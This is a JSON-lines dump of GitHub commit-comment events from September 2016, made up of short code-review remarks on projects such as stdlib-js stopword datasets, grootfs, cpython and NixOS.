{"id":"4590884822","type":"CommitCommentEvent","actor":{"login":"midfies"},"repo":{"name":"midfies/about_me"},"payload":{"comment":{"id":19099559,"position":null,"line":null,"path":null,"commit_id":"c62cecaea78987324c04c3cce294d791decff316","created_at":"2016-09-20T16:38:32Z","updated_at":"2016-09-20T16:38:32Z","body":"Here is a sample message for leaving comments on commit"}},"created_at":"2016-09-20T16:38:32Z"}
{"id":"4590884904","type":"CommitCommentEvent","actor":{"login":"Jon-Bovi"},"repo":{"name":"Jon-Bovi/about_me"},"payload":{"comment":{"id":19099561,"position":null,"line":null,"path":null,"commit_id":"105c5cb3d8f02a615cd137d1ecefcbfadb01dd25","created_at":"2016-09-20T16:38:33Z","updated_at":"2016-09-20T16:38:33Z","body":"Yo check out my radical html skillz."}},"created_at":"2016-09-20T16:38:33Z"}
{"id":"4590885832","type":"CommitCommentEvent","actor":{"login":"Briguy52"},"repo":{"name":"hack-duke/hackduke-portal"},"payload":{"comment":{"id":19099564,"position":null,"line":null,"path":null,"commit_id":"236c0b879c9247bb034b8c385a812497a7a1e413","created_at":"2016-09-20T16:38:43Z","updated_at":"2016-09-20T16:38:43Z","body":"about to undo this"}},"created_at":"2016-09-20T16:38:43Z"}
{"id":"4590886398","type":"CommitCommentEvent","actor":{"login":"pavelpark"},"repo":{"name":"pavelpark/about_me"},"payload":{"comment":{"id":19099565,"position":null,"line":null,"path":null,"commit_id":"0c3a670f83bc09d6a15eaaf3eda60fc0bd71df68","created_at":"2016-09-20T16:38:49Z","updated_at":"2016-09-20T16:38:49Z","body":"Great code!"}},"created_at":"2016-09-20T16:38:49Z"}
{"id":"4590886823","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19099566,"position":5,"line":5,"path":"lib/node_modules/@stdlib/datasets/savoy-stopwords-fr/datapackage.json","commit_id":"f083d9e648dfd89fe54c9a70e842695f45a887f3","created_at":"2016-09-20T16:38:54Z","updated_at":"2016-09-20T16:38:54Z","body":"The number of stop words is not needed. This is just sthg else which has to be maintained, like, e.g., were Savoy to publish a set of updated stop words where the set no longer has 463 members."}},"created_at":"2016-09-20T16:38:54Z"}
{"id":"4590887759","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19099570,"position":10,"line":10,"path":"lib/node_modules/@stdlib/datasets/savoy-stopwords-fr/datapackage.json","commit_id":"f083d9e648dfd89fe54c9a70e842695f45a887f3","created_at":"2016-09-20T16:39:02Z","updated_at":"2016-09-20T16:39:02Z","body":"See comment above."}},"created_at":"2016-09-20T16:39:02Z"}
{"id":"4590888495","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19099576,"position":20,"line":20,"path":"lib/node_modules/@stdlib/datasets/savoy-stopwords-fr/datapackage.json","commit_id":"f083d9e648dfd89fe54c9a70e842695f45a887f3","created_at":"2016-09-20T16:39:10Z","updated_at":"2016-09-20T16:39:10Z","body":"See comment above."}},"created_at":"2016-09-20T16:39:10Z"}
{"id":"4590889582","type":"CommitCommentEvent","actor":{"login":"gajop"},"repo":{"name":"Spring-Chobby/Chobby"},"payload":{"comment":{"id":19099582,"position":null,"line":null,"path":null,"commit_id":"b996bbb097a8c8ffe2ebdf182a6aa0b7eb978394","created_at":"2016-09-20T16:39:20Z","updated_at":"2016-09-20T16:39:20Z","body":"What's wrong with `screen0:FocusControl(myControl)` ?"}},"created_at":"2016-09-20T16:39:20Z"}
{"id":"4590890331","type":"CommitCommentEvent","actor":{"login":"albertoleal"},"repo":{"name":"cloudfoundry/grootfs"},"payload":{"comment":{"id":19099586,"position":26,"line":168,"path":"image_puller/unpacker/namespaced_cmd_linux.go","commit_id":"29c04d6ac0472daab9916223e7d14ded8c8d712f","created_at":"2016-09-20T16:39:28Z","updated_at":"2016-09-20T16:39:28Z","body":"Do we need to make this a buffered channel? We may end up loosing some entries in case of the channel gets full. \r\n\r\nHow about using unbuffered channel in this scenario?\r\n\r\n```go\r\nbuffer := bytes.NewBuffer(raw)\r\nentries := make(chan chug.Entry)\r\ngo chug.Chug(buffer, entries)\r\n\r\nfor entry := range entries {\r\n  if entry.IsLager {\r\n   // ...\r\n  }\r\n}\r\n```"}},"created_at":"2016-09-20T16:39:28Z"}
{"id":"4590890424","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19099587,"position":4,"line":4,"path":"lib/node_modules/@stdlib/datasets/savoy-stopwords-fr/package.json","commit_id":"f083d9e648dfd89fe54c9a70e842695f45a887f3","created_at":"2016-09-20T16:39:29Z","updated_at":"2016-09-20T16:39:29Z","body":"The number of stop words is not needed."}},"created_at":"2016-09-20T16:39:29Z"}
{"id":"4590891937","type":"CommitCommentEvent","actor":{"login":"grim4ik"},"repo":{"name":"grim4ik/1.kodutoo-IV-ruhm"},"payload":{"comment":{"id":19099594,"position":null,"line":null,"path":null,"commit_id":"4a2b740ded90db09c19f46c6e751e41b3d7dd87a","created_at":"2016-09-20T16:39:44Z","updated_at":"2016-09-20T16:39:44Z","body":"test"}},"created_at":"2016-09-20T16:39:44Z"}
{"id":"4590893037","type":"CommitCommentEvent","actor":{"login":"jfisteus"},"repo":{"name":"jfisteus/ztreamy"},"payload":{"comment":{"id":19099596,"position":60,"line":274,"path":"ztreamy/data/static/ztreamy.js","commit_id":"c76fdf7b0c7fa6b30ee6c8e1049ced80dabb54bf","created_at":"2016-09-20T16:39:56Z","updated_at":"2016-09-20T16:39:56Z","body":"Application-Id"}},"created_at":"2016-09-20T16:39:56Z"}
{"id":"4590893321","type":"CommitCommentEvent","actor":{"login":"jfisteus"},"repo":{"name":"jfisteus/ztreamy"},"payload":{"comment":{"id":19099597,"position":64,"line":277,"path":"ztreamy/data/static/ztreamy.js","commit_id":"c76fdf7b0c7fa6b30ee6c8e1049ced80dabb54bf","created_at":"2016-09-20T16:39:58Z","updated_at":"2016-09-20T16:39:58Z","body":"Event-Type"}},"created_at":"2016-09-20T16:39:58Z"}
{"id":"4590894892","type":"CommitCommentEvent","actor":{"login":"breadlesscode"},"repo":{"name":"stbaer/Keen-UI"},"payload":{"comment":{"id":19099600,"position":null,"line":null,"path":null,"commit_id":"4a1624344d69dddca315845a85829a60612a7d1a","created_at":"2016-09-20T16:40:14Z","updated_at":"2016-09-20T16:40:14Z","body":"Shouldn't it be the following\r\n\r\n```javascript\r\n var startRipple = function startRipple(eventType, event) {\r\n     var startRipple = function startRipple(eventType, event) {\r\n     var holder = event.currentTarget;\r\n\r\n     if (!holder) {\r\n         return;\r\n     }\r\n\r\n      if (! classlist.has(holder, 'ui-ripple-ink')) { \r\n          holder = holder.querySelector('.ui-ripple-ink');\r\n\r\n         if (!holder) {     \r\n             return;        \r\n         }      \r\n      }\r\n      "}},"created_at":"2016-09-20T16:40:14Z"}
{"id":"4590895010","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19099601,"position":3,"line":3,"path":"lib/node_modules/@stdlib/datasets/savoy-stopwords-fr/README.md","commit_id":"f083d9e648dfd89fe54c9a70e842695f45a887f3","created_at":"2016-09-20T16:40:14Z","updated_at":"2016-09-20T16:40:14Z","body":"For the high-level description, the number of stop words is not needed."}},"created_at":"2016-09-20T16:40:14Z"}
{"id":"4590895266","type":"CommitCommentEvent","actor":{"login":"cooler-SAI"},"repo":{"name":"cooler-SAI/JadeCore548-patched"},"payload":{"comment":{"id":19099604,"position":null,"line":null,"path":null,"commit_id":"efe0b244e4d65889ee08909d1a49847bf5bb8f9e","created_at":"2016-09-20T16:40:17Z","updated_at":"2016-09-20T16:40:17Z","body":"yes, but colums wasn't right"}},"created_at":"2016-09-20T16:40:17Z"}
{"id":"4590899898","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19099611,"position":21,"line":21,"path":"lib/node_modules/@stdlib/datasets/savoy-stopwords-fr/README.md","commit_id":"f083d9e648dfd89fe54c9a70e842695f45a887f3","created_at":"2016-09-20T16:40:58Z","updated_at":"2016-09-20T16:40:58Z","body":"I am more sympathetic to including the number of stop words here, we need to remember however that doing so here will increase the maintenance overhead.\r\n"}},"created_at":"2016-09-20T16:40:58Z"}
{"id":"4590901441","type":"CommitCommentEvent","actor":{"login":"srfarias"},"repo":{"name":"Nougat-Surnia/android_device_motorola_msm8916-common"},"payload":{"comment":{"id":19099621,"position":null,"line":null,"path":null,"commit_id":"748633abd5f813b4df15e926168bd3ae8bbba1ee","created_at":"2016-09-20T16:41:14Z","updated_at":"2016-09-20T16:41:14Z","body":"Avoid issues for now.. "}},"created_at":"2016-09-20T16:41:14Z"}
{"id":"4590901801","type":"CommitCommentEvent","actor":{"login":"miaekim"},"repo":{"name":"benjioh5/icewall-guideline"},"payload":{"comment":{"id":19099622,"position":null,"line":null,"path":null,"commit_id":"2064497afb83a913dcffc14a98d2e47745e18947","created_at":"2016-09-20T16:41:18Z","updated_at":"2016-09-20T16:41:18Z","body":"헐 한양대 `.edu`가 아니라 `.ac.kr` 이라니 ;ㅅ; 도메인에 돈좀 쓰시지 "}},"created_at":"2016-09-20T16:41:18Z"}
{"id":"4590903511","type":"CommitCommentEvent","actor":{"login":"wence-"},"repo":{"name":"firedrakeproject/firedrake"},"payload":{"comment":{"id":19099629,"position":4,"line":34,"path":"firedrake/__init__.py","commit_id":"6c89d8171ebbd696be7193f0e99a709bfe7846a0","created_at":"2016-09-20T16:41:35Z","updated_at":"2016-09-20T16:41:35Z","body":"Done."}},"created_at":"2016-09-20T16:41:35Z"}
{"id":"4590904329","type":"CommitCommentEvent","actor":{"login":"wilkinsona"},"repo":{"name":"spring-io/initializr"},"payload":{"comment":{"id":19099632,"position":5,"line":5,"path":"initializr-generator/src/main/resources/templates/gitignore.tmpl","commit_id":"d61bf18fa2b7703783ae5315f431afaf5c1d2876","created_at":"2016-09-20T16:41:43Z","updated_at":"2016-09-20T16:41:43Z","body":"I definitely wouldn't add `.DS_Store`. It's macOS-specific and as such belongs in Mac users' global .gitignore."}},"created_at":"2016-09-20T16:41:43Z"}
{"id":"4590905066","type":"CommitCommentEvent","actor":{"login":"hillsp"},"repo":{"name":"pagespeed/ngx_pagespeed"},"payload":{"comment":{"id":19099634,"position":59,"line":124,"path":"scripts/build_ngx_pagespeed.sh","commit_id":"f67f4c19b5f5fd8da19fd79a8476ce129ff8a2e4","created_at":"2016-09-20T16:41:52Z","updated_at":"2016-09-20T16:41:52Z","body":"Shouldn't this test be part of the main flow so that it's run even if \"latest\" isn't used?"}},"created_at":"2016-09-20T16:41:52Z"}
{"id":"4590908086","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19099639,"position":29,"line":29,"path":"lib/node_modules/@stdlib/datasets/savoy-stopwords-fr/package.json","commit_id":"f083d9e648dfd89fe54c9a70e842695f45a887f3","created_at":"2016-09-20T16:42:23Z","updated_at":"2016-09-20T16:42:23Z","body":"No longer using MIT. Use Apache-2.0."}},"created_at":"2016-09-20T16:42:23Z"}
{"id":"4590908129","type":"CommitCommentEvent","actor":{"login":"stden"},"repo":{"name":"grigoryev-k/PollApplication"},"payload":{"comment":{"id":19099640,"position":null,"line":null,"path":null,"commit_id":"b7e976ef18e7e8631a2c2e462c81b177e3f3d228","created_at":"2016-09-20T16:42:24Z","updated_at":"2016-09-20T16:42:24Z","body":"Какое отношение имеет это изменение к пункту 4.4?"}},"created_at":"2016-09-20T16:42:24Z"}
{"id":"4590908982","type":"CommitCommentEvent","actor":{"login":"RobvanderDoes"},"repo":{"name":"OpenViX/enigma2"},"payload":{"comment":{"id":19099645,"position":null,"line":null,"path":null,"commit_id":"988379ee1df1e88c6e74236cd79749abbb7489f9","created_at":"2016-09-20T16:42:33Z","updated_at":"2016-09-20T16:42:33Z","body":"> Done: http://forums.openpli.org/topic/34370-plugin-het-weer/?view=findpost&p=590644\r\n\r\nPlugin has been fixed: http://forums.openpli.org/topic/34370-plugin-het-weer/?view=findpost&p=590800"}},"created_at":"2016-09-20T16:42:33Z"}
{"id":"4590909405","type":"CommitCommentEvent","actor":{"login":"srfarias"},"repo":{"name":"Nougat-Surnia/android_device_motorola_msm8916-common"},"payload":{"comment":{"id":19099647,"position":null,"line":null,"path":null,"commit_id":"3c2c0163fd3979c4952a5f07f09fcd9e52618fee","created_at":"2016-09-20T16:42:37Z","updated_at":"2016-09-20T16:42:37Z","body":"- CONFIG_PRONTO_WLAN=y"}},"created_at":"2016-09-20T16:42:37Z"}
{"id":"4590915188","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19099668,"position":91,"line":91,"path":"lib/node_modules/@stdlib/math/base/random/lib/index.js","commit_id":"35b7441c90fc9f117edd7667cd2ecd267dcc4b64","created_at":"2016-09-20T16:43:37Z","updated_at":"2016-09-20T16:43:37Z","body":"Not sure why or how this is allowed. But this is a duplicate entry. See line 75."}},"created_at":"2016-09-20T16:43:37Z"}
{"id":"4590918178","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19099678,"position":4,"line":4,"path":"lib/node_modules/@stdlib/math/base/random/package.json","commit_id":"35b7441c90fc9f117edd7667cd2ecd267dcc4b64","created_at":"2016-09-20T16:44:06Z","updated_at":"2016-09-20T16:44:06Z","body":"Typo. `generators`."}},"created_at":"2016-09-20T16:44:06Z"}
{"id":"4590918374","type":"CommitCommentEvent","actor":{"login":"LarsAsplund"},"repo":{"name":"VHDL/CoreLib"},"payload":{"comment":{"id":19099679,"position":null,"line":null,"path":null,"commit_id":"470271f2a77e92625142dc1cd99c01e16e08d19d","created_at":"2016-09-20T16:44:08Z","updated_at":"2016-09-20T16:44:08Z","body":"I think that there are a number of methods that we need for a more complete dictionary implementation:\r\n* Something that allows us to loop over all items in a dictionary without knowing the keys in advance. If we could get a list of keys and/or values we could to that.\r\n* We need a way to copy a dictionary to another. Special case of your `Merge`.\r\n* A convenience is `Pop(key)` which would be the combination of `Get` and `Del` for that key. Python also has a `Pop` without any key that returns and deletes an arbitrary key/value pair. That would also enable you to loop over all items in a dictionary but you would also clear that dictionary when doing so\r\n"}},"created_at":"2016-09-20T16:44:08Z"}
{"id":"4590919806","type":"CommitCommentEvent","actor":{"login":"stden"},"repo":{"name":"grigoryev-k/PollApplication"},"payload":{"comment":{"id":19099685,"position":null,"line":null,"path":null,"commit_id":"52d839b604a832c6d92a5251dd000f6f19b896d4","created_at":"2016-09-20T16:44:21Z","updated_at":"2016-09-20T16:44:21Z","body":"Тут подошёл бы комментарий: \"Игнорируем каталог настроек проекта Intellj Idea .idea, поскольку у каждого разботчика там могут быть свои настройки\""}},"created_at":"2016-09-20T16:44:21Z"}
{"id":"4590920746","type":"CommitCommentEvent","actor":{"login":"ma3a"},"repo":{"name":"bezgerts/Handshakes"},"payload":{"comment":{"id":19099689,"position":23,"line":24,"path":"src/main/java/Starter.java","commit_id":"61a2f79225cf454d1e600f16e48bd5fa8c3708a0","created_at":"2016-09-20T16:44:30Z","updated_at":"2016-09-20T16:44:30Z","body":"Можно написать метод, который бы разбивал лист на список подлистов по 200 записей\r\n"}},"created_at":"2016-09-20T16:44:30Z"}
{"id":"4590922154","type":"CommitCommentEvent","actor":{"login":"dougmartin"},"repo":{"name":"concord-consortium/HASDashboard"},"payload":{"comment":{"id":19099693,"position":null,"line":null,"path":null,"commit_id":"16769cfdb5469d88a72979dcb37119b043617196","created_at":"2016-09-20T16:44:45Z","updated_at":"2016-09-20T16:44:45Z","body":"Looks good 👍 "}},"created_at":"2016-09-20T16:44:45Z"}
{"id":"4590923733","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19099696,"position":30,"line":30,"path":"lib/node_modules/@stdlib/datasets/savoy-stopwords-ger/LICENSE","commit_id":"50ce1fdb9d8c00d0dea8879e9ecf41b79ad1e256","created_at":"2016-09-20T16:45:01Z","updated_at":"2016-09-20T16:45:01Z","body":"Apache-2.0"}},"created_at":"2016-09-20T16:45:01Z"}
{"id":"4590923767","type":"CommitCommentEvent","actor":{"login":"tas50"},"repo":{"name":"chef/chef"},"payload":{"comment":{"id":19099697,"position":null,"line":null,"path":null,"commit_id":"6fc09c47b465c89de988cc39c52da157ec0a51d7","created_at":"2016-09-20T16:45:01Z","updated_at":"2016-09-20T16:45:01Z","body":" This fix is now released in the 12.14.77 release of chef"}},"created_at":"2016-09-20T16:45:01Z"}
{"id":"4590925499","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19099701,"position":3,"line":3,"path":"lib/node_modules/@stdlib/datasets/savoy-stopwords-ger/README.md","commit_id":"50ce1fdb9d8c00d0dea8879e9ecf41b79ad1e256","created_at":"2016-09-20T16:45:17Z","updated_at":"2016-09-20T16:45:17Z","body":"Remove number of stop words."}},"created_at":"2016-09-20T16:45:17Z"}
{"id":"4590927670","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19099707,"position":27,"line":27,"path":"lib/node_modules/@stdlib/datasets/savoy-stopwords-ger/README.md","commit_id":"50ce1fdb9d8c00d0dea8879e9ecf41b79ad1e256","created_at":"2016-09-20T16:45:39Z","updated_at":"2016-09-20T16:45:39Z","body":"Missing quotes."}},"created_at":"2016-09-20T16:45:39Z"}
{"id":"4590930447","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19099713,"position":65,"line":65,"path":"lib/node_modules/@stdlib/datasets/savoy-stopwords-ger/README.md","commit_id":"50ce1fdb9d8c00d0dea8879e9ecf41b79ad1e256","created_at":"2016-09-20T16:46:08Z","updated_at":"2016-09-20T16:46:08Z","body":"The license disclaimer should be included in the README, matching the convention used by other datasets."}},"created_at":"2016-09-20T16:46:08Z"}
{"id":"4590930860","type":"CommitCommentEvent","actor":{"login":"marceloguarido"},"repo":{"name":"marceloguarido/datasciencecoursera"},"payload":{"comment":{"id":19099715,"position":null,"line":null,"path":null,"commit_id":"759aea5e213c1dfd632bd84f30986d967d81d236","created_at":"2016-09-20T16:46:12Z","updated_at":"2016-09-20T16:46:12Z","body":"Test"}},"created_at":"2016-09-20T16:46:12Z"}
{"id":"4590932110","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19099717,"position":5,"line":5,"path":"lib/node_modules/@stdlib/datasets/savoy-stopwords-ger/datapackage.json","commit_id":"50ce1fdb9d8c00d0dea8879e9ecf41b79ad1e256","created_at":"2016-09-20T16:46:25Z","updated_at":"2016-09-20T16:46:25Z","body":"Remove number of stop words."}},"created_at":"2016-09-20T16:46:25Z"}
{"id":"4590932925","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19099720,"position":10,"line":10,"path":"lib/node_modules/@stdlib/datasets/savoy-stopwords-ger/datapackage.json","commit_id":"50ce1fdb9d8c00d0dea8879e9ecf41b79ad1e256","created_at":"2016-09-20T16:46:34Z","updated_at":"2016-09-20T16:46:34Z","body":"See line 5 comment."}},"created_at":"2016-09-20T16:46:34Z"}
{"id":"4590933539","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19099721,"position":20,"line":20,"path":"lib/node_modules/@stdlib/datasets/savoy-stopwords-ger/datapackage.json","commit_id":"50ce1fdb9d8c00d0dea8879e9ecf41b79ad1e256","created_at":"2016-09-20T16:46:40Z","updated_at":"2016-09-20T16:46:40Z","body":"See above."}},"created_at":"2016-09-20T16:46:40Z"}
{"id":"4590934916","type":"CommitCommentEvent","actor":{"login":"ma3a"},"repo":{"name":"bezgerts/Handshakes"},"payload":{"comment":{"id":19099723,"position":23,"line":24,"path":"src/main/java/Starter.java","commit_id":"61a2f79225cf454d1e600f16e48bd5fa8c3708a0","created_at":"2016-09-20T16:46:54Z","updated_at":"2016-09-20T16:46:54Z","body":"Вместо инстанцирования HandShakeTread я бы сделал подход с джобами. Посмотри на Feature, можно было бы сделать список Feature и запускать их через ThreadPoolExecutor"}},"created_at":"2016-09-20T16:46:54Z"}
{"id":"4590935037","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19099724,"position":45,"line":45,"path":"lib/node_modules/@stdlib/datasets/savoy-stopwords-ger/datapackage.json","commit_id":"50ce1fdb9d8c00d0dea8879e9ecf41b79ad1e256","created_at":"2016-09-20T16:46:55Z","updated_at":"2016-09-20T16:46:55Z","body":"Not a valid SPDX identifier."}},"created_at":"2016-09-20T16:46:55Z"}
{"id":"4590935708","type":"CommitCommentEvent","actor":{"login":"nre-ableton"},"repo":{"name":"python/cpython"},"payload":{"comment":{"id":19099727,"position":null,"line":null,"path":null,"commit_id":"06dfbbc1585e28e20dd203e75f17ef48ca9b547e","created_at":"2016-09-20T16:47:01Z","updated_at":"2016-09-20T16:47:01Z","body":"FYI this change breaks other platforms, since it causes `buflen` to be unassigned."}},"created_at":"2016-09-20T16:47:01Z"}
{"id":"4590936444","type":"CommitCommentEvent","actor":{"login":"RonnyPfannschmidt"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":19099728,"position":null,"line":null,"path":null,"commit_id":"93c160fabc0e3b5fb3d997c840ef86a68f4bce00","created_at":"2016-09-20T16:47:09Z","updated_at":"2016-09-20T16:47:09Z","body":"@Baughn as some who only uses nixos on desktop and portable systems i strongly disagree,\r\n\r\nthis patch pretty much will bring ux issues and bugs back to me for multiuser usage\r\n\r\nalso on nixos its trivial to declare per user services - a user shouldn't even need that kind of transient state"}},"created_at":"2016-09-20T16:47:09Z"}
{"id":"4590936548","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19099729,"position":10,"line":10,"path":"lib/node_modules/@stdlib/datasets/savoy-stopwords-ger/lib/index.js","commit_id":"50ce1fdb9d8c00d0dea8879e9ecf41b79ad1e256","created_at":"2016-09-20T16:47:10Z","updated_at":"2016-09-20T16:47:10Z","body":"Single quotes, not double."}},"created_at":"2016-09-20T16:47:10Z"}
{"id":"4590937019","type":"CommitCommentEvent","actor":{"login":"ma3a"},"repo":{"name":"bezgerts/Handshakes"},"payload":{"comment":{"id":19099732,"position":1,"line":7,"path":".idea/workspace.xml","commit_id":"61a2f79225cf454d1e600f16e48bd5fa8c3708a0","created_at":"2016-09-20T16:47:15Z","updated_at":"2016-09-20T16:47:15Z","body":"Лучше бы его добавить в .gitignore"}},"created_at":"2016-09-20T16:47:15Z"}
{"id":"4590937366","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19099733,"position":4,"line":4,"path":"lib/node_modules/@stdlib/datasets/savoy-stopwords-ger/package.json","commit_id":"50ce1fdb9d8c00d0dea8879e9ecf41b79ad1e256","created_at":"2016-09-20T16:47:19Z","updated_at":"2016-09-20T16:47:19Z","body":"Remove number of words."}},"created_at":"2016-09-20T16:47:19Z"}
{"id":"4590938230","type":"CommitCommentEvent","actor":{"login":"vmassol"},"repo":{"name":"xwiki/xwiki-platform"},"payload":{"comment":{"id":19099739,"position":74,"line":126,"path":"xwiki-platform-core/xwiki-platform-rendering/xwiki-platform-rendering-macros/xwiki-platform-rendering-macro-gallery/src/main/java/org/xwiki/rendering/internal/macro/gallery/GalleryMacro.java","commit_id":"fe99128dbc7bbea586beeabf19e9d660ee23f657","created_at":"2016-09-20T16:47:28Z","updated_at":"2016-09-20T16:47:28Z","body":"ok I thought we wanted to avoid inline style as a best practice?"}},"created_at":"2016-09-20T16:47:28Z"}
{"id":"4590939635","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19099743,"position":30,"line":30,"path":"lib/node_modules/@stdlib/datasets/savoy-stopwords-ger/package.json","commit_id":"50ce1fdb9d8c00d0dea8879e9ecf41b79ad1e256","created_at":"2016-09-20T16:47:43Z","updated_at":"2016-09-20T16:47:43Z","body":"Remove license value. This will be autogenerated."}},"created_at":"2016-09-20T16:47:43Z"}
{"id":"4590940403","type":"CommitCommentEvent","actor":{"login":"jaschweder"},"repo":{"name":"raivieira/base-api-php"},"payload":{"comment":{"id":19099745,"position":7,"line":161,"path":"src/Doctrine/ORM/Entities/BaseEntity.php","commit_id":"462893dbdcdcdb7caa58f8e7d53f14bdd2f9753b","created_at":"2016-09-20T16:47:51Z","updated_at":"2016-09-20T16:47:51Z","body":"@raivieira por que precisa desse ```$set``` ?"}},"created_at":"2016-09-20T16:47:51Z"}
{"id":"4590942031","type":"CommitCommentEvent","actor":{"login":"ma3a"},"repo":{"name":"bezgerts/Handshakes"},"payload":{"comment":{"id":19099747,"position":44,"line":42,"path":"src/main/java/Starter.java","commit_id":"7381678126bfa47a858a8914b577ee29265bccd9","created_at":"2016-09-20T16:48:09Z","updated_at":"2016-09-20T16:48:09Z","body":"Можно вообще логгер прикрутить"}},"created_at":"2016-09-20T16:48:09Z"}
{"id":"4590943712","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19099752,"position":29,"line":29,"path":"lib/node_modules/@stdlib/datasets/savoy-stopwords-fr/package.json","commit_id":"f083d9e648dfd89fe54c9a70e842695f45a887f3","created_at":"2016-09-20T16:48:27Z","updated_at":"2016-09-20T16:48:27Z","body":"Also, the value for the `license` field should be empty as it will be auto-generated."}},"created_at":"2016-09-20T16:48:27Z"}
{"id":"4590944594","type":"CommitCommentEvent","actor":{"login":"basnijholt"},"repo":{"name":"basnijholt/hpc05"},"payload":{"comment":{"id":19099758,"position":7,"line":6,"path":"setup.py","commit_id":"4e433935261e1d54fc71de9fa74f4552b5c224ac","created_at":"2016-09-20T16:48:36Z","updated_at":"2016-09-20T16:48:36Z","body":"Thanks 👍 "}},"created_at":"2016-09-20T16:48:36Z"}
{"id":"4590945587","type":"CommitCommentEvent","actor":{"login":"jaschweder"},"repo":{"name":"raivieira/base-api-php"},"payload":{"comment":{"id":19099762,"position":4,"line":174,"path":"src/Doctrine/ORM/Entities/BaseEntity.php","commit_id":"c78c890863fe3c4bcef1b365d37dc66d324a0309","created_at":"2016-09-20T16:48:46Z","updated_at":"2016-09-20T16:48:46Z","body":"@raivieira por que precisa setar ```null``` quando for '' ou \"\" ? o correto é o projeto cliente realizar o tratamento"}},"created_at":"2016-09-20T16:48:46Z"}
{"id":"4590948981","type":"CommitCommentEvent","actor":{"login":"MitchBradley"},"repo":{"name":"quozl/cforth-1"},"payload":{"comment":{"id":19099771,"position":null,"line":null,"path":null,"commit_id":"9d3d888af88428ed460c5dd217f6a8dbf5c57a1e","created_at":"2016-09-20T16:49:20Z","updated_at":"2016-09-20T16:49:20Z","body":"Are you doing rapid-fire connections?  PCB are not freed until the\nTIME_WAIT state expires.  I shortened MSL so they are freed after a few\nseconds instead of a couple of minutes, but even so, in rapid-fire\nconditions, it can appear that leakage is occurring.  The PCBs\neventually get freed though.\n\nOn 9/20/2016 1:42 AM, James Cameron wrote:\n> I'm fairly confident that I'm leaking |pcb|'s and it may be that\n> |memp_free| needs to be called for TIME_WAIT, FIN_WAIT_2, and LAST_ACK\n> connections, as done in |espconn_kill_oldest|.\n> \n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/quozl/cforth-1/commit/9d3d888af88428ed460c5dd217f6a8dbf5c57a1e#commitcomment-19094706>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AEoszRt1eijnkZiDpLgGcz_URoXMjASDks5qr8axgaJpZM4KBTn4>.\n> \n"}},"created_at":"2016-09-20T16:49:20Z"}
{"id":"4590949870","type":"CommitCommentEvent","actor":{"login":"whiskeyromeo"},"repo":{"name":"whiskeyromeo/CommunityQuestionAnswering"},"payload":{"comment":{"id":19099774,"position":128,"line":128,"path":"vomitRepo/whiskeyPrimer2.py","commit_id":"a4e48129d57cf471fd7f81be7fbcc07096055079","created_at":"2016-09-20T16:49:30Z","updated_at":"2016-09-20T16:49:30Z","body":"punkt/english.pickle(aka punkt) is the tokenizer package, model.save saves the model so it can be recalled at a later point. So if I'm in my virtualenv, I don't have to keep the terminal window open at all, I can actually exit and then pull up that model at a later point. I'm not sure that punkt is even the best tokenizer to use for this, most of this is just a rehash on the bag of popcorn code with some reconfiguration to fit the data."}},"created_at":"2016-09-20T16:49:30Z"}
{"id":"4590952734","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19099782,"position":30,"line":30,"path":"lib/node_modules/@stdlib/datasets/savoy-stopwords-it/LICENSE","commit_id":"123016c7c03182fb0d87d27b56a7919c50f1360a","created_at":"2016-09-20T16:49:57Z","updated_at":"2016-09-20T16:49:57Z","body":"Apache-2.0"}},"created_at":"2016-09-20T16:49:57Z"}
